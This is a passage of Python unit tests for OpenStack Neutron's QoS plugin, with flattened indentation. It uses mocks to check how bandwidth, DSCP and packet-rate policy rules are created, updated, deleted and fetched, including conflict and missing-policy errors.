'update_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(rule_create_mock_call) <
mock_manager.mock_calls.index(update_precommit_mock_call) <
mock_manager.mock_calls.index(update_mock_call))
def test_create_policy_rule_check_rule_min_less_than_max(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.qos_plugin.create_policy_minimum_bandwidth_rule(
self.ctxt, _policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
self.mock_qos_load_attr.assert_called_once_with('rules')
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_rule_check_rule_max_more_than_min(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_bw_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.qos_plugin.create_policy_bandwidth_limit_rule(
self.ctxt, _policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
self.mock_qos_load_attr.assert_called_once_with('rules')
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_rule_check_rule_bwlimit_less_than_minbw(self):
_policy = self._get_policy()
self.rule_data['bandwidth_limit_rule']['max_kbps'] = 1
setattr(_policy, "rules", [self.min_bw_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.create_policy_bandwidth_limit_rule,
self.ctxt, self.policy.id, self.rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_rule_check_rule_minbw_gr_than_bwlimit(self):
_policy = self._get_policy()
self.rule_data['minimum_bandwidth_rule']['min_kbps'] = 1000000
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.create_policy_minimum_bandwidth_rule,
self.ctxt, self.policy.id, self.rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_rule_duplicates(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.rule])
new_rule_data = {
'bandwidth_limit_rule': {
'max_kbps': 5000,
'direction': self.rule.direction
}
}
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(
qos_exc.QoSRulesConflict,
self.qos_plugin.create_policy_bandwidth_limit_rule,
self.ctxt, _policy.id, new_rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
@mock.patch.object(rule_object.QosBandwidthLimitRule, 'update')
def test_update_policy_rule(self, mock_qos_rule_update):
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_rule_update, 'update')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.rule.get_rules',
return_value=[self.rule]), mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.rule_data['bandwidth_limit_rule']['max_kbps'] = 1
self.qos_plugin.update_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
rule_update_mock_call = mock.call.update()
update_precommit_mock_call = mock.call.driver.call(
'update_policy_precommit', self.ctxt, mock.ANY)
update_mock_call = mock.call.driver.call(
'update_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(rule_update_mock_call) <
mock_manager.mock_calls.index(update_precommit_mock_call) <
mock_manager.mock_calls.index(update_mock_call))
def test_update_policy_rule_check_rule_min_less_than_max(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, self.policy.id, self.rule_data)
self.mock_qos_load_attr.assert_called_once_with('rules')
self._validate_driver_params('update_policy', self.ctxt)
rules = [self.rule, self.min_bw_rule]
setattr(_policy, "rules", rules)
self.mock_qos_load_attr.reset_mock()
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_minimum_bandwidth_rule(
self.ctxt, self.min_bw_rule.id,
self.policy.id, self.rule_data)
self.mock_qos_load_attr.assert_called_once_with('rules')
self._validate_driver_params('update_policy', self.ctxt)
def test_update_policy_rule_check_rule_bwlimit_less_than_minbw(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, self.policy.id, self.rule_data)
self.mock_qos_load_attr.assert_called_once_with('rules')
self._validate_driver_params('update_policy', self.ctxt)
self.rule_data['minimum_bandwidth_rule']['min_kbps'] = 1000
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.assertRaises(
qos_exc.QoSRuleParameterConflict,
self.qos_plugin.update_policy_minimum_bandwidth_rule,
self.ctxt, self.min_bw_rule.id,
self.policy.id, self.rule_data)
def test_update_policy_rule_check_rule_minbw_gr_than_bwlimit(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_bw_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_minimum_bandwidth_rule(
self.ctxt, self.min_bw_rule.id, self.policy.id,
self.rule_data)
self.mock_qos_load_attr.assert_called_once_with('rules')
self._validate_driver_params('update_policy', self.ctxt)
self.rule_data['bandwidth_limit_rule']['max_kbps'] = 1
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.assertRaises(
qos_exc.QoSRuleParameterConflict,
self.qos_plugin.update_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id,
self.policy.id, self.rule_data)
def _get_policy(self):
return policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
def test_update_policy_rule_bad_policy(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [])
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.update_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, self.policy.id,
self.rule_data)
@mock.patch.object(rule_object.QosBandwidthLimitRule, 'delete')
def test_delete_policy_rule(self, mock_qos_rule_delete):
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_rule_delete, 'delete')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.rule])
self.qos_plugin.delete_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, _policy.id)
self._validate_driver_params('update_policy', self.ctxt)
rule_delete_mock_call = mock.call.delete()
update_precommit_mock_call = mock.call.driver.call(
'update_policy_precommit', self.ctxt, mock.ANY)
update_mock_call = mock.call.driver.call(
'update_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(rule_delete_mock_call) <
mock_manager.mock_calls.index(update_precommit_mock_call) <
mock_manager.mock_calls.index(update_mock_call))
def test_delete_policy_rule_bad_policy(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [])
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.delete_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, _policy.id)
def test_get_policy_bandwidth_limit_rule(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosBandwidthLimitRule.'
'get_object') as get_object_mock:
self.qos_plugin.get_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, self.policy.id)
get_object_mock.assert_called_once_with(self.ctxt,
id=self.rule.id)
def test_get_policy_bandwidth_limit_rules_for_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosBandwidthLimitRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_bandwidth_limit_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_bandwidth_limit_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosBandwidthLimitRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_bandwidth_limit_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY,
qos_policy_id=self.policy.id,
filter='filter_id')
def test_get_policy_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy,
self.ctxt, self.policy.id)
def test_get_policy_bandwidth_limit_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, self.policy.id)
def test_get_policy_bandwidth_limit_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_bandwidth_limit_rules,
self.ctxt, self.policy.id)
def test_create_policy_dscp_marking_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.dscp_rule])
self.qos_plugin.create_policy_dscp_marking_rule(
self.ctxt, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_update_policy_dscp_marking_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.dscp_rule])
self.qos_plugin.update_policy_dscp_marking_rule(
self.ctxt, self.dscp_rule.id, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_delete_policy_dscp_marking_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.dscp_rule])
self.qos_plugin.delete_policy_dscp_marking_rule(
self.ctxt, self.dscp_rule.id, self.policy.id)
self._validate_driver_params('update_policy', self.ctxt)
def test_get_policy_dscp_marking_rules(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosDscpMarkingRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_dscp_marking_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_dscp_marking_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosDscpMarkingRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_dscp_marking_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, qos_policy_id=self.policy.id,
_pager=mock.ANY, filter='filter_id')
def test_get_policy_dscp_marking_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_dscp_marking_rule,
self.ctxt, self.dscp_rule.id, self.policy.id)
def test_get_policy_dscp_marking_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_dscp_marking_rules,
self.ctxt, self.policy.id)
def test_get_policy_minimum_bandwidth_rule(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumBandwidthRule.'
'get_object') as get_object_mock:
self.qos_plugin.get_policy_minimum_bandwidth_rule(
self.ctxt, self.rule.id, self.policy.id)
get_object_mock.assert_called_once_with(self.ctxt,
id=self.rule.id)
def test_get_policy_minimum_bandwidth_rules_for_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumBandwidthRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_minimum_bandwidth_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_minimum_bandwidth_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumBandwidthRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_minimum_bandwidth_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY,
qos_policy_id=self.policy.id,
filter='filter_id')
def test_get_policy_minimum_bandwidth_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_minimum_bandwidth_rule,
self.ctxt, self.rule.id, self.policy.id)
def test_get_policy_minimum_bandwidth_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_minimum_bandwidth_rules,
self.ctxt, self.policy.id)
def test_create_policy_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.create_policy_bandwidth_limit_rule,
self.ctxt, self.policy.id, self.rule_data)
def test_update_policy_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.update_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, self.policy.id, self.rule_data)
def test_delete_policy_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.delete_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, self.policy.id)
def test_verify_bad_method_call(self):
self.assertRaises(AttributeError, getattr, self.qos_plugin,
'create_policy_bandwidth_limit_rules')
def test_get_rule_type(self):
admin_ctxt = context.get_admin_context()
drivers_details = [{
'name': 'fake-driver',
'supported_parameters': [{
'parameter_name': 'max_kbps',
'parameter_type': lib_constants.VALUES_TYPE_RANGE,
'parameter_range': {'start': 0, 'end': 100}
}]
}]
with mock.patch.object(
qos_plugin.QoSPlugin, "supported_rule_type_details",
return_value=drivers_details
):
rule_type_details = self.qos_plugin.get_rule_type(
admin_ctxt, qos_consts.RULE_TYPE_BANDWIDTH_LIMIT)
self.assertEqual(
qos_consts.RULE_TYPE_BANDWIDTH_LIMIT,
rule_type_details['type'])
self.assertEqual(
drivers_details, rule_type_details['drivers'])
def test_get_rule_type_as_user(self):
self.assertRaises(
lib_exc.NotAuthorized,
self.qos_plugin.get_rule_type,
self.ctxt, qos_consts.RULE_TYPE_BANDWIDTH_LIMIT)
def test_get_rule_types(self):
filters = {'type': 'type_id'}
with mock.patch.object(qos_plugin.QoSPlugin, 'supported_rule_types',
return_value=qos_consts.VALID_RULE_TYPES):
types = self.qos_plugin.get_rule_types(self.ctxt, filters=filters)
self.assertEqual(sorted(qos_consts.VALID_RULE_TYPES),
sorted(type_['type'] for type_ in types))
@mock.patch('neutron.objects.ports.Port')
@mock.patch('neutron.objects.qos.policy.QosPolicy')
def test_rule_notification_and_driver_ordering(self, qos_policy_mock,
port_mock):
rule_cls_mock = mock.Mock()
rule_cls_mock.rule_type = 'fake'
rule_actions = {'create': [self.ctxt, rule_cls_mock,
self.policy.id, {'fake_rule': {}}],
'update': [self.ctxt, rule_cls_mock,
self.rule.id,
self.policy.id, {'fake_rule': {}}],
'delete': [self.ctxt, rule_cls_mock,
self.rule.id, self.policy.id]}
mock_manager = mock.Mock()
mock_manager.attach_mock(qos_policy_mock, 'QosPolicy')
mock_manager.attach_mock(port_mock, 'Port')
mock_manager.attach_mock(rule_cls_mock, 'RuleCls')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
for action, arguments in rule_actions.items():
mock_manager.reset_mock()
method = getattr(self.qos_plugin, "%s_policy_rule" % action)
method(*arguments)
# some actions get rule from policy
get_rule_mock_call = getattr(
mock.call.QosPolicy.get_policy_obj().get_rule_by_id(),
action)()
# some actions construct rule from class reference
rule_mock_call = getattr(mock.call.RuleCls(), action)()
driver_mock_call = mock.call.driver.call('update_policy',
self.ctxt, mock.ANY)
if rule_mock_call in mock_manager.mock_calls:
action_index = mock_manager.mock_calls.index(rule_mock_call)
else:
action_index = mock_manager.mock_calls.index(
get_rule_mock_call)
self.assertLess(
action_index, mock_manager.mock_calls.index(driver_mock_call))
def test_create_policy_packet_rate_limit_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.pps_rule])
self.qos_plugin.create_policy_packet_rate_limit_rule(
self.ctxt, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_create_policy_pps_rule_duplicates(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.pps_rule])
new_rule_data = {
'packet_rate_limit_rule': {
'max_kpps': 400,
'direction': self.pps_rule.direction
}
}
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(
qos_exc.QoSRulesConflict,
self.qos_plugin.create_policy_packet_rate_limit_rule,
self.ctxt, _policy.id, new_rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_update_policy_packet_rate_limit_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.pps_rule])
self.qos_plugin.update_policy_packet_rate_limit_rule(
self.ctxt, self.pps_rule.id, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_update_policy_pps_rule_bad_policy(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [])
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.update_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, self.policy.id,
self.rule_data)
def test_delete_policy_packet_rate_limit_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.pps_rule])
self.qos_plugin.delete_policy_packet_rate_limit_rule(
self.ctxt, self.pps_rule.id, self.policy.id)
self._validate_driver_params('update_policy', self.ctxt)
def test_delete_policy_pps_rule_bad_policy(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [])
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.delete_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, _policy.id)
def test_get_policy_packet_rate_limit_rule(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosPacketRateLimitRule.'
'get_object') as get_object_mock:
self.qos_plugin.get_policy_packet_rate_limit_rule(
self.ctxt, self.pps_rule.id, self.policy.id)
get_object_mock.assert_called_once_with(self.ctxt,
id=self.pps_rule.id)
def test_get_policy_packet_rate_limit_rules_for_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosPacketRateLimitRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_packet_rate_limit_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_packet_rate_limit_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosPacketRateLimitRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_packet_rate_limit_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY,
qos_policy_id=self.policy.id,
filter='filter_id')
def test_get_policy_packet_rate_limit_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, self.policy.id)
def test_get_policy_packet_rate_limit_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_packet_rate_limit_rules,
self.ctxt, self.policy.id)
def test_create_policy_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.create_policy_packet_rate_limit_rule,
self.ctxt, self.policy.id, self.rule_data)
def test_update_policy_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.update_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, self.policy.id, self.rule_data)
def test_delete_policy_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.delete_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, self.policy.id)
def test_get_pps_rule_type(self):
admin_ctxt = context.get_admin_context()
drivers_details = [{
'name': 'fake-driver',
'supported_parameters': [{
'parameter_name': 'max_kpps',
'parameter_type': lib_constants.VALUES_TYPE_RANGE,
'parameter_range': {'start': 0, 'end': 100}
}]
}]
with mock.patch.object(
qos_plugin.QoSPlugin, "supported_rule_type_details",
return_value=drivers_details
):
rule_type_details = self.qos_plugin.get_rule_type(
admin_ctxt, qos_consts.RULE_TYPE_PACKET_RATE_LIMIT)
self.assertEqual(
qos_consts.RULE_TYPE_PACKET_RATE_LIMIT,
rule_type_details['type'])
self.assertEqual(
drivers_details, rule_type_details['drivers'])
def test_get_pps_rule_type_as_user(self):
self.assertRaises(
lib_exc.NotAuthorized,
self.qos_plugin.get_rule_type,
self.ctxt, qos_consts.RULE_TYPE_PACKET_RATE_LIMIT)
def test_create_min_pps_rule_on_bound_port(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
segment = network_object.NetworkSegment(
physical_network='fake physnet')
net = network_object.Network(
self.ctxt,
segments=[segment])
port = ports_object.Port(
self.ctxt,
id=uuidutils.generate_uuid(),
network_id=uuidutils.generate_uuid(),
device_owner='compute:fake-zone')
with mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy), \
mock.patch(
'neutron.objects.network.Network.get_object',
return_value=net), \
mock.patch.object(
self.qos_plugin,
'_get_ports_with_policy',
return_value=[port]):
self.assertRaises(
NotImplementedError,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, _policy.id, self.rule_data)
def test_create_min_pps_rule_on_unbound_port(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
segment = network_object.NetworkSegment(
physical_network='fake physnet')
net = network_object.Network(
self.ctxt,
segments=[segment])
port = ports_object.Port(
self.ctxt,
id=uuidutils.generate_uuid(),
network_id=uuidutils.generate_uuid(),
device_owner='')
with mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy), \
mock.patch(
'neutron.objects.network.Network.get_object',
return_value=net), \
mock.patch.object(
self.qos_plugin,
'_get_ports_with_policy',
return_value=[port]):
try:
self.qos_plugin.create_policy_minimum_packet_rate_rule(
self.ctxt, _policy.id, self.rule_data)
except NotImplementedError:
self.fail()
def test_create_policy_rule_check_rule_min_pps_direction_conflict(self):
_policy = self._get_policy()
self.rule_data['minimum_packet_rate_rule']['direction'] = 'any'
setattr(_policy, "rules", [self.min_pps_rule])
rules = [
{
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'ingress'
}
},
{
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'egress'
}
},
]
for new_rule_data in rules:
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, self.policy.id, new_rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt,
id=_policy.id)
for rule_data in rules:
min_pps_rule = rule_object.QosMinimumPacketRateRule(
self.ctxt, **rule_data['minimum_packet_rate_rule'])
setattr(_policy, "rules", [min_pps_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, self.policy.id, self.rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt,
id=_policy.id)
def test_create_policy_min_pps_rule(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.create_policy_minimum_packet_rate_rule(
self.ctxt, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_create_policy_min_pps_rule_duplicates(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
new_rule_data = {
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 1234,
'direction': self.min_pps_rule.direction,
},
}
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(
qos_exc.QoSRulesConflict,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, _policy.id, new_rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_min_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, self.policy.id, self.rule_data)
def test_update_policy_min_pps_rule(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_minimum_packet_rate_rule(
self.ctxt, self.min_pps_rule.id, self.policy.id,
self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_update_policy_rule_check_rule_min_pps_direction_conflict(self):
_policy = self._get_policy()
rules_data = [
{
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'ingress'
}
},
{
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'egress'
}
},
]
self.rule_data['minimum_packet_rate_rule']['direction'] = 'any'
for rule_data in rules_data:
rules = [
rule_object.QosMinimumPacketRateRule(
self.ctxt, **rules_data[0]['minimum_packet_rate_rule']),
rule_object.QosMinimumPacketRateRule(
self.ctxt, **rules_data[1]['minimum_packet_rate_rule']),
]
setattr(_policy, 'rules', rules)
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
